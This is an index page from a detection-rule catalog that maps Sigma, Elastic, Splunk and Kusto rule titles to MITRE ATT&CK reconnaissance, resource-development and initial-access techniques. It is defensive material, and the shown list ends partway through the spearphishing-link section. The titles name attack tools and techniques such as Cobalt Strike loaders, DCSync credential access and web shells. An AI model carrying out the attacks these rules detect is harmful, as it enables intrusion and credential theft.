Detection rules
5975 catalog-relevant detection rules from Sigma, Elastic, Splunk, and Kusto: 5974 parsed into the vendor-neutral intermediate representation. Each rule page surfaces predicates, exclusions, and the indicators that other rules share with it.
Status:
Vendor:
Reconnaissance
Gather Victim Identity Information T1589 3 rules
- Splunk Kerberos User Enumeration production
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
- Splunk Windows Gather Victim Identity SAM Info production
Gather Victim Identity Information: Credentials T1589.001 1 rule
- Splunk Windows Gather Victim Identity SAM Info production
Gather Victim Identity Information: Email Addresses T1589.002 2 rules
- Splunk Kerberos User Enumeration production
- Sigma Potential Unconstrained Delegation Discovery Via Get-ADComputer - ScriptBlock experimental
Gather Victim Network Information T1590 11 rules
- Sigma Failed DNS Zone Transfer test
- Splunk Local LLM Framework DNS Query production
- Kusto Network Port Sweep from External Network (ASIM Network Session schema) available
- Sigma PUA - Crassus Execution test
- Kusto Rare client observed with high reverse DNS lookup count - Anomaly based (ASIM DNS Solution) available
- Kusto Rare client observed with high reverse DNS lookup count - Static threshold based (ASIM DNS Solution) available
- Sigma Suspicious DNS Query for IP Lookup Service APIs test
- Splunk Wermgr Process Connecting To IP Check Web Services production
- Splunk Windows DNS Gather Network Info production
- Splunk Windows Gather Victim Network Info Through Ip Check Web Services production
- Splunk Windows WinPEAS PowerShell Script Execution production
Gather Victim Network Information: Domain Properties T1590.001 1 rule
- Sigma PUA - Crassus Execution test
Gather Victim Network Information: DNS T1590.002 2 rules
- Sigma Failed DNS Zone Transfer test
- Splunk Windows DNS Gather Network Info production
Gather Victim Network Information: IP Addresses T1590.005 2 rules
- Splunk Wermgr Process Connecting To IP Check Web Services production
- Splunk Windows Gather Victim Network Info Through Ip Check Web Services production
Gather Victim Host Information T1592 6 rules
- Splunk Recon AVProduct Through Pwh or WMI production
- Splunk Recon Using WMI Class production
- Splunk System Info Gathering Using Dxdiag Application production
- Splunk Windows Gather Victim Host Information Camera production
- Splunk Windows WinPEAS PowerShell Script Execution production
- Splunk WMI Recon Running Process Or Services production
Gather Victim Host Information: Hardware T1592.001 1 rule
- Splunk Windows Gather Victim Host Information Camera production
Gather Victim Host Information: Software T1592.002 1 rule
- Splunk Windows WinPEAS PowerShell Script Execution production
Gather Victim Host Information: Client Configurations T1592.004 1 rule
- Splunk Windows WinPEAS PowerShell Script Execution production
Search Open Websites/Domains T1593 1 rule
- Sigma Suspicious Git Clone test
Active Scanning T1595 6 rules
- Splunk Attacker Tools On Endpoint production
- Sigma Grixba Malware Reconnaissance Activity experimental
- Sigma PUA - PingCastle Execution test
- Sigma PUA - PingCastle Execution From Potentially Suspicious Parent test
- Splunk Windows Detect Network Scanner Behavior production
- Splunk Windows Netspy Network Scanner Execution production
Active Scanning: Scanning IP Blocks T1595.001 2 rules
- Sigma Grixba Malware Reconnaissance Activity experimental
- Splunk Windows Detect Network Scanner Behavior production
Active Scanning: Vulnerability Scanning T1595.002 1 rule
- Splunk Windows Detect Network Scanner Behavior production
Phishing for Information T1598 2 rules
- Sigma HTML File Opened From Download Folder experimental
- Splunk Windows RDP File Execution production
Phishing for Information: Spearphishing Attachment T1598.002 2 rules
- Sigma HTML File Opened From Download Folder experimental
- Splunk Windows RDP File Execution production
Resource Development
Compromise Infrastructure T1584 2 rules
- Sigma WebDAV Temporary Local File Creation test
- Sigma Windows Update Error stable
Develop Capabilities T1587 15 rules
- Sigma Conti Volume Shadow Listing test
- Sigma Creation of an Executable by an Executable test
- Sigma CVE-2021-1675 Print Spooler Exploitation Filename Pattern test
- Sigma FoggyWeb Backdoor DLL Loading test
- Sigma Formbook Process Creation test
- Sigma HackTool - PurpleSharp Execution test
- Sigma Mustang Panda Dropper test
- Sigma Potential Privilege Escalation To LOCAL SYSTEM test
- Sigma Potential PsExec Remote Execution test
- Sigma PsExec/PAExec Escalation to LOCAL SYSTEM test
- Sigma PUA - CsExec Execution test
- Sigma Suspicious Word Cab File Write CVE-2021-40444 test
- Sigma Uncommon File Created In Office Startup Folder test
- Sigma VHD Image Download Via Browser test
- Splunk Windows Certutil Root Certificate Addition production
Develop Capabilities: Malware T1587.001 10 rules
- Sigma Conti Volume Shadow Listing test
- Sigma Creation of an Executable by an Executable test
- Sigma Formbook Process Creation test
- Sigma Mustang Panda Dropper test
- Sigma Potential Privilege Escalation To LOCAL SYSTEM test
- Sigma Potential PsExec Remote Execution test
- Sigma PsExec/PAExec Escalation to LOCAL SYSTEM test
- Sigma PUA - CsExec Execution test
- Sigma Uncommon File Created In Office Startup Folder test
- Sigma VHD Image Download Via Browser test
Develop Capabilities: Digital Certificates T1587.003 1 rule
- Splunk Windows Certutil Root Certificate Addition production
Obtain Capabilities T1588 12 rules
- Sigma Hacktool Execution - Imphash test
- Sigma Hacktool Execution - PE Metadata test
- Sigma Potential Execution of Sysinternals Tools test
- Sigma PUA - Sysinternal Tool Execution - Registry test
- Sigma PUA - Sysinternals Tools Execution - Registry test
- Sigma Renamed SysInternals DebugView Execution test
- Sigma Suspicious Execution Of Renamed Sysinternals Tools - Registry test
- Sigma Suspicious Keyboard Layout Load test
- Sigma Usage of Renamed Sysinternals Tools - RegistrySet test
- Splunk Windows NirSoft AdvancedRun production
- Splunk Windows NirSoft Tool Bundle File Created production
- Splunk Windows NirSoft Utilities production
Obtain Capabilities: Tool T1588.002 12 rules
- Sigma Hacktool Execution - Imphash test
- Sigma Hacktool Execution - PE Metadata test
- Sigma Potential Execution of Sysinternals Tools test
- Sigma PUA - Sysinternal Tool Execution - Registry test
- Sigma PUA - Sysinternals Tools Execution - Registry test
- Sigma Renamed SysInternals DebugView Execution test
- Sigma Suspicious Execution Of Renamed Sysinternals Tools - Registry test
- Sigma Suspicious Keyboard Layout Load test
- Sigma Usage of Renamed Sysinternals Tools - RegistrySet test
- Splunk Windows NirSoft AdvancedRun production
- Splunk Windows NirSoft Tool Bundle File Created production
- Splunk Windows NirSoft Utilities production
Stage Capabilities T1608 6 rules
- Sigma HybridConnectionManager Service Installation - Registry test
- Sigma Suspicious Download from Office Domain test
- Splunk Windows Cobalt Strike PowerShell Loader production
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows NorthStar C2 Agent Execution production
- Splunk Windows Unusual File Creation in Confluence Directory production
Stage Capabilities: Upload Malware T1608.001 1 rule
- Splunk Windows Unusual File Creation in Confluence Directory production
Stage Capabilities: Upload Tool T1608.002 1 rule
- Splunk Windows Unusual File Creation in Confluence Directory production
Initial Access
Valid Accounts T1078 67 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Kusto Account added and removed from privileged groups
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Account Tampering - Suspicious Failed Logon Reasons test
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Kusto AdminSDHolder Modifications
- Elastic AdminSDHolder SDProp Exclusion Added production
- Sigma Azure Windows virtual machine login via serial console experimental
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Kusto EatonForeseer - Unauthorized Logins available
- Kusto Email access via active sync
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Elastic First Time Seen Account Performing DCSync production
- Kusto Group created then added to built in domain local or global group
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma Lateral movement detection (based on "special groups" feature) experimental
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Multiple Host logons (Windows Event Log)
- Kusto Multiple Password Reset by user
- Sigma Network login performed to multiple targets experimental
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Kusto New user created and added to the built-in administrators group
- Sigma Password Provided In Command Line Of Net.EXE test
- Elastic Potential Account Takeover - Logon from New Source IP production
- Elastic Potential Account Takeover - Mixed Logon Types production
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Rubeus Password Change (Windows Event Log)
- Splunk Short Lived Windows Accounts production
- Kusto Sign-ins from IPs that attempt sign-ins to disabled accounts (Uses Authentication Normalization)
- Sigma Success login attempt on a Windows OpenSSH server experimental
- Splunk Suspicious Computer Account Name Change production
- Sigma Suspicious Computer Machine Password by PowerShell test
- Splunk Suspicious Kerberos Service Ticket Request production
- Sigma Suspicious Remote Logon with Explicit Credentials test
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Unusual Number of Computer Service Tickets Requested experimental
- Splunk Unusual Number of Remote Endpoint Authentication Events experimental
- Kusto User account added to built in domain local or global group
- Kusto User account created and deleted within 10 mins
- Kusto User account enabled and disabled within 10 mins
- Sigma User Added to Local Administrator Group stable
- Kusto User login from different countries within 3 hours (Uses Authentication Normalization)
- Splunk Windows Azure PowerShell Module Installation Via PowerShell Script production
- Splunk Windows ConvertTo-AADIntBackdoor Execution Via PowerShell Script production
- Splunk Windows Entra User Management Via Azure CLI production
- Splunk Windows Group Policy Object Created production
- Splunk Windows Guest Account Enabled Via Net.EXE production
- Splunk Windows Large Number of Computer Service Tickets Requested production
- Splunk Windows Multiple Account Passwords Changed production
- Splunk Windows Multiple Accounts Deleted production
- Splunk Windows Multiple Accounts Disabled production
- Splunk Windows PowerView AD Access Control List Enumeration production
- Splunk WMIC Explicit Credentials (Sysmon)
- Splunk WMIC Explicit Credentials (Windows Event Log)
Valid Accounts: Default Accounts T1078.001 6 rules
- Splunk Account set to active via Net.exe (EDR)
- Splunk Account set to active via Net.exe (Sysmon)
- Splunk Account set to active via Net.exe (Windows Event Log)
- Sigma Admin User Remote Logon test
- Sigma Commvault QLogin with PublicSharingUser and GUID Password (CVE-2025-57788) experimental
- Splunk Windows Guest Account Enabled Via Net.EXE production
Valid Accounts: Domain Accounts T1078.002 20 rules
- Elastic Access to a Sensitive LDAP Attribute production
- Sigma Account renamed to admin (or likely) account to evade defense experimental
- Sigma Admin User Remote Logon test
- Elastic AdminSDHolder Backdoor production
- Elastic AdminSDHolder SDProp Exclusion Added production
- Elastic Delegated Managed Service Account Modification by an Unusual User production
- Elastic dMSA Account Creation by an Unusual User production
- Sigma DMSA Link Attributes Modified experimental
- Sigma DMSA Service Account Created in Specific OUs - PowerShell experimental
- Elastic First Time Seen Account Performing DCSync production
- Elastic Kerberos Pre-authentication Disabled for User production
- Sigma New DMSA Service Account Created in Specific OUs experimental
- Elastic Potential Credential Access via DCSync production
- Elastic Potential Privileged Escalation via SamAccountName Spoofing production
- Elastic Remote Computer Account DnsHostName Update production
- Splunk Suspicious Computer Account Name Change production
- Splunk Suspicious Kerberos Service Ticket Request production
- Splunk Suspicious Ticket Granting Ticket Request production
- Splunk Windows Group Policy Object Created production
- Splunk Windows PowerView AD Access Control List Enumeration production
Valid Accounts: Local Accounts T1078.003 4 rules
- Elastic Account Discovery Command via SYSTEM Account production
- Sigma Admin User Remote Logon test
- Elastic Mounting Hidden or WebDav Remote Shares production
- Splunk Short Lived Windows Accounts production
Valid Accounts: Cloud Accounts T1078.004 1 rule
- Splunk Windows Entra User Management Via Azure CLI production
Replication Through Removable Media T1091 8 rules
- Elastic Execution from a Removable Media with Network Connection production
- Sigma External Disk Drive Or USB Storage Device Was Recognized By The System test
- Elastic First Time Seen Removable Device production
- Splunk Removable Media Detected (Windows Event Log)
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows Replication Through Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
External Remote Services T1133 28 rules
- Splunk Detect Exchange Web Shell production
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (PowerShell)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Sysmon)
- Splunk Disabled Pre-Authentication Accounts Discovery - PowerShell (Windows Event Log)
- Sigma External Remote RDP Logon from Public IP test
- Sigma External Remote SMB Logon from Public IP test
- Sigma Failed Logon From Public IP test
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Splunk Outbound Network Connection from Java Using Default Ports production
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Splunk RDP Brute-force Detection (Windows Event Log)
- Splunk RDP Connection (Sysmon)
- Splunk RDP Connection (Windows Event Log)
- Splunk RDP Hijacking (Windows Event Log)
- Splunk RDP Logon_Logoff Event (Windows Event Log)
- Sigma Remote Access Tool - ScreenConnect Installation Execution test
- Sigma Remote Access Tool - Team Viewer Session Started On Windows Host test
- Sigma Running Chrome VPN Extensions via the Registry 2 VPN Extension test
- Sigma Suspicious File Created by ArcSOC.exe experimental
- Splunk Temporary ConnectWise xml File Activity (Windows Event Log)
- Sigma Unusual Child Process of dns.exe test
- Sigma Unusual File Deletion by Dns.exe test
- Sigma Unusual File Modification by dns.exe test
- Sigma User Added to Remote Desktop Users Group test
- Splunk Web or Application Server Spawning a Shell production
- Splunk Windows MOVEit Transfer Writing ASPX production
- Splunk Windows PaperCut NG Spawn Shell production
- Splunk Windows RDPClient Connection Sequence Events production
Drive-by Compromise T1189 5 rules
- Splunk Detect hosts connecting to dynamic domain providers production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Masquerading as Business App Installer production
- Kusto RecordedFuture Threat Hunting Hash All Actors
- Elastic WPS Office Exploitation via DLL Hijack production
Exploit Public-Facing Application T1190 81 rules
- Sigma Apache Spark Shell Command Injection - ProcessCreation test
- Sigma Atlassian Confluence CVE-2022-26134 test
- Kusto AV detections related to SpringShell Vulnerability available
- Sigma Commvault QLogin Argument Injection Authentication Bypass (CVE-2025-57791) experimental
- Splunk ConnectWise ScreenConnect Path Traversal production
- Splunk ConnectWise ScreenConnect Path Traversal Windows SACL production
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) test
- Sigma CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) test
- Sigma CVE-2024-50623 Exploitation Attempt - Cleo experimental
- Splunk Detect Exchange Web Shell production
- Sigma DNS RCE CVE-2020-1350 test
- Kusto Exchange OAB Virtual Directory Attribute Containing Potential Webshell available
- Sigma Exploitation Activity of CVE-2025-59287 - WSUS Suspicious Child Process experimental
- Sigma Exploited CVE-2020-10189 Zoho ManageEngine test
- Sigma Failed Logon From Public IP test
- Kusto Identify SysAid Server web shell creation
- Sigma Linux Suspicious Child Process from Node.js - React2Shell experimental
- Sigma LPE InstallerFileTakeOver PoC CVE-2021-41379 test
- Kusto Microsoft Defender for Endpoint (MDE) signatures for Azure Synapse pipelines and Azure Data Factory
- Elastic Microsoft Exchange Server UM Spawning Suspicious Processes production
- Elastic Microsoft Exchange Server UM Writing Suspicious Files production
- Elastic Microsoft Exchange Worker Spawning Suspicious Processes production
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Sysmon)
- Splunk Microsoft SQL Server Suspicious Child Process - Windows (Windows Event Log)
- Splunk MS Exchange Mailbox Replication service writing Active Server Pages experimental
- Splunk Outbound Network Connection from Java Using Default Ports production
- Sigma Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt test
- Sigma Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon test
- Sigma Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution test
- Sigma Potential CVE-2022-26809 Exploitation Attempt test
- Sigma Potential Exploitation Attempt Of Undocumented WindowsServer RCE test
- Sigma Potential Exploitation of CrushFTP RCE Vulnerability (CVE-2025-54309) experimental
- Sigma Potential Exploitation of GoAnywhere MFT Vulnerability experimental
- Splunk Potential Exposed SMB_RDP Port - Windows (Windows Event Log)
- Sigma Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity test
- Sigma Potential SAP NetWeaver Webshell Creation experimental
- Sigma Potential SAP NetWeaver Webshell Creation - Linux experimental
- Sigma Potential SharePoint ToolShell CVE-2025-53770 Exploitation - File Create experimental
- Sigma Potential SharePoint ToolShell CVE-2025-53770 Exploitation Indicators experimental
- Splunk Potential SMB Activity from External IP - Windows (Windows Event Log)
- Sigma Remote Access Tool - ScreenConnect Server Web Shell Execution test
- Elastic ScreenConnect Server Spawning Suspicious Processes production
- Kusto Silk Typhoon New UM Service Child Process
- Sigma Suspicious Child Process of SAP NetWeaver experimental
- Sigma Suspicious Child Process of SAP NetWeaver - Linux experimental
- Sigma Suspicious Child Process of SolarWinds WebHelpDesk experimental
- Sigma Suspicious Child Process Of SQL Server test
- Splunk Suspicious Confluence Child Process - Windows (Sysmon)
- Splunk Suspicious Confluence Child Process - Windows (Windows Event Log)
- Sigma Suspicious CrushFTP Child Process experimental
- Sigma Suspicious File Drop by Exchange test
- Sigma Suspicious File Write to SharePoint Layouts Directory experimental
- Sigma Suspicious File Write to Webapps Root Directory experimental
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious MSExchangeMailboxReplication ASPX Write test
- Sigma Suspicious Process By Web Server Process test
- Sigma Suspicious Processes Spawned by WinRM test
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Terminal Service Process Spawn test
- Elastic Unusual Child Process of dns.exe production
- Elastic Unusual File Operation by dns.exe production
- Elastic Unusual Process For MSSQL Service Accounts production
- Splunk Web or Application Server Spawning a Shell production
- Splunk WebLogic CVE-2017-10271 (PowerShell)
- Splunk WebLogic CVE-2017-10271 (Sysmon)
- Splunk WebLogic CVE-2017-10271 (Windows Event Log)
- Splunk Windows Identify PowerShell Web Access IIS Pool production
- Splunk Windows Metasploit Confluence Plugin Execution production
- Splunk Windows MOVEit Transfer Writing ASPX production
- Splunk Windows PaperCut NG Spawn Shell production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Splunk Windows SharePoint Spinstall0 Webshell File Creation production
- Splunk Windows Shell or Script Execution From IIS Directory production
- Splunk Windows Shell Process from CrushFTP production
- Sigma Windows Suspicious Child Process from Node.js - React2Shell experimental
- Splunk Windows Suspicious React or Next.js Child Process production
- Splunk Windows TeamCity Payload Execution from Temp Directory production
- Splunk Windows TeamCity Plugin Installed production
- Splunk Windows Unusual File Creation in Confluence Directory production
- Splunk Windows WSUS Spawning Shell production
- Splunk WinRM Spawning a Process experimental
Supply Chain Compromise T1195 34 rules
- Splunk 3CX Supply Chain Attack Network Indicators production
- Splunk 3CXDesktopApp.exe Execution (EDR)
- Splunk 3CXDesktopApp.exe Execution (Sysmon)
- Splunk 3CXDesktopApp.exe Execution (Windows Event Log)
- Sigma Axios NPM Compromise File Creation Indicators - Linux experimental
- Sigma Axios NPM Compromise File Creation Indicators - MacOS experimental
- Sigma Axios NPM Compromise File Creation Indicators - Windows experimental
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Command Execution via SolarWinds Process production
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Splunk GitHub Workflow File Creation or Modification production
- Splunk Hunting 3CXDesktopApp Software production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Sigma Octopus Scanner Malware test
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation experimental
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation - Linux experimental
- Sigma Shai-Hulud Malicious Bun Execution experimental
- Sigma Shai-Hulud Malicious Bun Execution - Linux experimental
- Splunk Shai-Hulud Workflow File Creation or Modification production
- Elastic SolarWinds Process Disabling Services via Registry production
- Kusto Solorigate Defender Detections
- Kusto SUNBURST and SUPERNOVA backdoor hashes available
- Kusto SUNBURST and SUPERNOVA backdoor hashes (Normalized File Events)
- Kusto SUNBURST network beacons available
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious SolarWinds Child Process production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Splunk Windows Vulnerable 3CX Software production
Supply Chain Compromise: Compromise Software Dependencies and Development Tools T1195.001 1 rule
- Sigma Octopus Scanner Malware test
Supply Chain Compromise: Compromise Software Supply Chain T1195.002 24 rules
- Splunk 3CX Supply Chain Attack Network Indicators production
- Sigma Axios NPM Compromise File Creation Indicators - Linux experimental
- Sigma Axios NPM Compromise File Creation Indicators - MacOS experimental
- Sigma Axios NPM Compromise File Creation Indicators - Windows experimental
- Sigma Axios NPM Compromise Indicators - Linux experimental
- Sigma Axios NPM Compromise Indicators - macOS experimental
- Sigma Axios NPM Compromise Indicators - Windows experimental
- Elastic Command Execution via SolarWinds Process production
- Elastic Deprecated - SUNBURST Command and Control Activity production
- Splunk Hunting 3CXDesktopApp Software production
- Sigma LiteLLM / TeamPCP Supply Chain Attack Indicators experimental
- Sigma Notepad++ Updater DNS Query to Uncommon Domains experimental
- Splunk Shai-Hulud 2 Exfiltration Artifact Files production
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation experimental
- Sigma Shai-Hulud 2.0 Malicious NPM Package Installation - Linux experimental
- Sigma Shai-Hulud Malicious Bun Execution experimental
- Sigma Shai-Hulud Malicious Bun Execution - Linux experimental
- Elastic SolarWinds Process Disabling Services via Registry production
- Sigma Suspicious Child Process of Notepad++ Updater - GUP.Exe experimental
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious SolarWinds Child Process production
- Sigma TeamPCP LiteLLM Supply Chain Attack Persistence Indicators experimental
- Sigma Uncommon File Created by Notepad++ Updater Gup.EXE experimental
- Splunk Windows Vulnerable 3CX Software production
Hardware Additions T1200 6 rules
- Sigma Device Installation Blocked test
- Sigma External Disk Drive Or USB Storage Device Was Recognized By The System test
- Sigma USB Device Plugged test
- Splunk Windows Process Executed From Removable Media production
- Splunk Windows USBSTOR Registry Key Modification production
- Splunk Windows WPDBusEnum Registry Key Modification production
Phishing T1566 83 rules
- Sigma Arbitrary Shell Command Execution Via Settingcontent-Ms test
- Elastic Creation of SettingContent-ms Files production
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits test
- Sigma CVE-2021-31979 CVE-2021-33771 Exploits by Sourgum test
- Splunk Detect Outlook exe writing a zip file production
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Execution of File Written or Modified by Microsoft Office production
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Elastic File with Suspicious Extension Downloaded production
- Sigma HTML File Opened From Download Folder experimental
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma ISO File Created Within Temp Folders test
- Sigma ISO Image Mounted test
- Sigma ISO or Image Mount Indicator in Recent Files test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Kusto Office ASR rule triggered from browser spawned office process. available
- Sigma Office Macro File Creation test
- Sigma Office Macro File Creation From Suspicious Process test
- Sigma Office Macro File Download test
- Sigma Password Protected ZIP File Opened (Email Attachment) test
- Sigma Phishing Pattern ISO in Archive test
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Foxmail Exploitation production
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Elastic Potential Process Injection from Malicious Document production
- Elastic Potential Remote File Execution via MSIEXEC production
- Splunk Process Creating LNK file in Suspicious Location production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Kusto RecordedFuture Threat Hunting Domain All Actors
- Elastic Remote Desktop File Opened from Suspicious Path production
- Elastic Remote XSL Script Execution via COM production
- Sigma Suspicious Double Extension File Execution stable
- Elastic Suspicious Execution from INET Cache production
- Sigma Suspicious Execution From Outlook Temporary Folder test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Created in Outlook Temporary Directory experimental
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious HWP Sub Processes test
- Sigma Suspicious Microsoft OneNote Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Kusto Suspicious MSC File Launched
- Kusto Suspicious parentprocess relationship - Office child processes. available
- Elastic Suspicious PDF Reader Child Process production
- Kusto T1566.002 Spearphishing Link - Rare URL Clicks
- Elastic Unusual Execution via Microsoft Common Console File production
- Sigma WebDAV Temporary Local File Creation test
- Splunk Windows CAB File on Disk production
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
- Splunk Windows InProcServer32 New Outlook Form production
- Splunk Windows ISO LNK File Creation production
- Splunk Windows Office Product Dropped Cab or Inf File production
- Splunk Windows Office Product Dropped Uncommon File production
- Splunk Windows Office Product Loaded MSHTML Module production
- Splunk Windows Office Product Loading Taskschd DLL production
- Splunk Windows Office Product Loading VBE7 DLL production
- Splunk Windows Office Product Spawned Child Process For Download production
- Splunk Windows Office Product Spawned Control production
- Splunk Windows Office Product Spawned MSDT production
- Splunk Windows Office Product Spawned Rundll32 With No DLL production
- Splunk Windows Office Product Spawned Uncommon Process production
- Splunk Windows Phishing Outlook Drop Dll In FORM Dir production
- Splunk Windows Phishing PDF File Executes URL Link production
- Splunk Windows Phishing Recent ISO Exec Registry production
- Sigma Windows Registry Trust Record Modification test
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Splunk Windows Spearphishing Attachment Connect To None MS Office Domain production
- Splunk Windows Spearphishing Attachment Onenote Spawn Mshta production
- Splunk Windows Universal Data Link File Creation production
Phishing: Spearphishing Attachment T1566.001 69 rules
- Sigma Arbitrary Shell Command Execution Via Settingcontent-Ms test
- Elastic Creation of SettingContent-ms Files production
- Splunk Detect Outlook exe writing a zip file production
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
- Sigma Droppers Exploiting CVE-2017-11882 stable
- Elastic Execution of File Written or Modified by Microsoft Office production
- Sigma Exploit for CVE-2017-0261 test
- Sigma Exploit for CVE-2017-8759 test
- Elastic File with Suspicious Extension Downloaded production
- Sigma HTML File Opened From Download Folder experimental
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma ISO File Created Within Temp Folders test
- Sigma ISO Image Mounted test
- Sigma ISO or Image Mount Indicator in Recent Files test
- Splunk Malicious Document Execution (Sysmon)
- Splunk Malicious Document Execution (Windows Event Log)
- Sigma Office Macro File Creation test
- Sigma Office Macro File Creation From Suspicious Process test
- Sigma Office Macro File Download test
- Sigma Password Protected ZIP File Opened (Email Attachment) test
- Elastic Potential CVE-2025-33053 Exploitation production
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Elastic Potential Foxmail Exploitation production
- Sigma Potential Initial Access via DLL Search Order Hijacking test
- Elastic Potential Process Injection from Malicious Document production
- Splunk RDP File Executed from Outlook Temp Directory (Sysmon)
- Splunk RDP File Executed from Outlook Temp Directory (Windows Event Log)
- Splunk RDP File Written by Outlook (Sysmon)
- Splunk RDP File Written by Outlook (Windows Event Log)
- Elastic Remote Desktop File Opened from Suspicious Path production
- Sigma Suspicious Double Extension File Execution stable
- Elastic Suspicious Execution from INET Cache production
- Sigma Suspicious Execution From Outlook Temporary Folder test
- Elastic Suspicious Execution via Microsoft Office Add-Ins production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious File Created in Outlook Temporary Directory experimental
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious HTML File Creation production
- Sigma Suspicious HWP Sub Processes test
- Sigma Suspicious Microsoft OneNote Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Elastic Unusual Execution via Microsoft Common Console File production
- Splunk Windows CAB File on Disk production
- Splunk Windows Defender ASR Audit Events production
- Splunk Windows Defender ASR Block Events production
- Splunk Windows Defender ASR Rules Stacking production
- Splunk Windows ISO LNK File Creation production
- Splunk Windows Office Product Dropped Cab or Inf File production
- Splunk Windows Office Product Dropped Uncommon File production
- Splunk Windows Office Product Loaded MSHTML Module production
- Splunk Windows Office Product Loading Taskschd DLL production
- Splunk Windows Office Product Loading VBE7 DLL production
- Splunk Windows Office Product Spawned Child Process For Download production
- Splunk Windows Office Product Spawned Control production
- Splunk Windows Office Product Spawned MSDT production
- Splunk Windows Office Product Spawned Rundll32 With No DLL production
- Splunk Windows Office Product Spawned Uncommon Process production
- Splunk Windows Phishing PDF File Executes URL Link production
- Splunk Windows Phishing Recent ISO Exec Registry production
- Sigma Windows Registry Trust Record Modification test
- Elastic Windows Script Executing PowerShell production
- Elastic Windows Script Interpreter Executing Process via WMI production
- Splunk Windows Spearphishing Attachment Connect To None MS Office Domain production
- Splunk Windows Spearphishing Attachment Onenote Spawn Mshta production
- Splunk Windows Universal Data Link File Creation production
Phishing: Spearphishing Link T1566.002 18 rules
- Elastic Downloaded Shortcut Files production
- Elastic Downloaded URL Files production
